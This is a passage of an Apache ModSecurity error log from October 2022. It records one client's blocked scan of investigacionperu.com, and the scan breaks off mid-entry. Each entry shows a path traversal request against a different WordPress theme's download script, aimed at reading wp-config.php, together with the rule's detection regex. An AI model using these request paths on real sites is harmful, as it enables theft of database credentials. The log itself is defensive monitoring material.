"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salient/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salient/download.php"] [unique_id "Y0ZxY2INFIoIk7hPzpaZMAAAAEE"] [Wed Oct 12 02:48:51.560864 2022] [:error] [pid 22338:tid 140534341363456] [client 185.189.115.30:50024] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyseventeen/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyseventeen/download.php"] [unique_id "Y0ZxY2INFIoIk7hPzpaZMQAAAFY"] [Wed Oct 12 02:48:51.715298 2022] [:error] [pid 22338:tid 140534324578048] [client 185.189.115.30:50026] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/verse/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/verse/download.php"] [unique_id "Y0ZxY2INFIoIk7hPzpaZMgAAAFg"] [Wed Oct 12 02:48:51.866001 2022] [:error] [pid 22337:tid 140534467254016] [client 185.189.115.30:50028] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wp-clean-slate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wp-clean-slate/download.php"] [unique_id "Y0ZxY6BKlkjFPqrcdjM3uQAAAAc"] [Wed Oct 12 02:48:52.017115 2022] [:error] [pid 22338:tid 140534597625600] [client 185.189.115.30:50030] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippe-riehling/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippe-riehling/functions/download.php"] [unique_id "Y0ZxZGINFIoIk7hPzpaZMwAAAEA"] [Wed Oct 12 02:48:52.168472 2022] [:error] [pid 22338:tid 140534442075904] [client 185.189.115.30:50032] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/directory-starter/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/directory-starter/download.php"] [unique_id "Y0ZxZGINFIoIk7hPzpaZNAAAAEo"] [Wed Oct 12 02:48:52.319417 2022] [:error] [pid 22972:tid 140534416897792] [client 185.189.115.30:50034] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/firestarter/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/firestarter/down.php"] [unique_id "Y0ZxZOLrJ0tgpRmNRAaHtAAAAM0"] [Wed Oct 12 02:48:52.470087 2022] [:error] [pid 22972:tid 140534349756160] [client 185.189.115.30:50036] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/presstissimo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/presstissimo/download.php"] [unique_id "Y0ZxZOLrJ0tgpRmNRAaHtQAAANU"] [Wed Oct 12 02:48:52.621474 2022] [:error] [pid 22339:tid 140534597625600] [client 185.189.115.30:50038] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acamir-theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acamir-theme/down.php"] [unique_id "Y0ZxZNmZws0mEkXxGo-VWAAAAIA"] [Wed Oct 12 02:48:52.817128 2022] [:error] [pid 22339:tid 140534475646720] [client 185.189.115.30:50040] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/agency/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/agency/down.php"] [unique_id "Y0ZxZNmZws0mEkXxGo-VWQAAAIY"] [Wed Oct 12 02:48:52.967971 2022] [:error] [pid 22339:tid 140534332970752] [client 185.189.115.30:50042] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/comune-di-fornelli/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/comune-di-fornelli/down.php"] [unique_id "Y0ZxZNmZws0mEkXxGo-VWgAAAJc"] [Wed Oct 12 02:48:53.119443 2022] [:error] [pid 22339:tid 140534358148864] [client 185.189.115.30:50044] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/delia/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/delia/down.php"] [unique_id "Y0ZxZdmZws0mEkXxGo-VWwAAAJQ"] [Wed Oct 12 02:48:53.270768 2022] [:error] [pid 22339:tid 140534324578048] [client 185.189.115.30:50046] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/g5_helium/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/g5_helium/down.php"] [unique_id "Y0ZxZdmZws0mEkXxGo-VXAAAAJg"] [Wed Oct 12 02:48:53.431049 2022] [:error] [pid 22339:tid 140534572447488] [client 185.189.115.30:50048] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hueman/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hueman/down.php"] [unique_id "Y0ZxZdmZws0mEkXxGo-VXQAAAIM"] [Wed Oct 12 02:48:53.582681 2022] [:error] [pid 22339:tid 140534366541568] [client 185.189.115.30:50050] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kayano/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kayano/down.php"] [unique_id "Y0ZxZdmZws0mEkXxGo-VXgAAAJM"] [Wed Oct 12 02:48:53.749063 2022] [:error] [pid 22338:tid 140534564054784] [client 185.189.115.30:50054] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/pinboard/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/pinboard/down.php"] [unique_id "Y0ZxZWINFIoIk7hPzpaZNgAAAEQ"] [Wed Oct 12 02:48:53.900338 2022] [:error] [pid 22337:tid 140534597625600] [client 185.189.115.30:50056] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/startheme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/startheme/down.php"] [unique_id "Y0ZxZaBKlkjFPqrcdjM3ugAAAAA"] [Wed Oct 12 02:48:54.051416 2022] [:error] [pid 22972:tid 140534597625600] [client 185.189.115.30:50058] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/tplbs/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/tplbs/down.php"] [unique_id "Y0ZxZuLrJ0tgpRmNRAaHtgAAAMA"] [Wed Oct 12 02:48:54.202460 2022] [:error] [pid 22339:tid 140534341363456] [client 185.189.115.30:50060] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php"] [unique_id "Y0ZxZtmZws0mEkXxGo-VXwAAAJY"] [Wed Oct 12 02:48:54.353342 2022] [:error] [pid 22972:tid 140534324578048] [client 185.189.115.30:50062] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/bergsoe/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/bergsoe/download.php"] [unique_id "Y0ZxZuLrJ0tgpRmNRAaHtwAAANg"] [Wed Oct 12 02:48:54.504486 2022] [:error] [pid 22972:tid 140534484039424] [client 185.189.115.30:50064] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/customizr/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/customizr/download.php"] [unique_id "Y0ZxZuLrJ0tgpRmNRAaHuAAAAMU"] [Wed Oct 12 02:48:54.657287 2022] [:error] [pid 22338:tid 140534383326976] [client 185.189.115.30:50066] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Divi/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Divi/download.php"] [unique_id "Y0ZxZmINFIoIk7hPzpaZNwAAAFE"] [Wed Oct 12 02:48:54.809128 2022] [:error] [pid 22338:tid 140534458861312] [client 185.189.115.30:50068] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/focustelecom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag 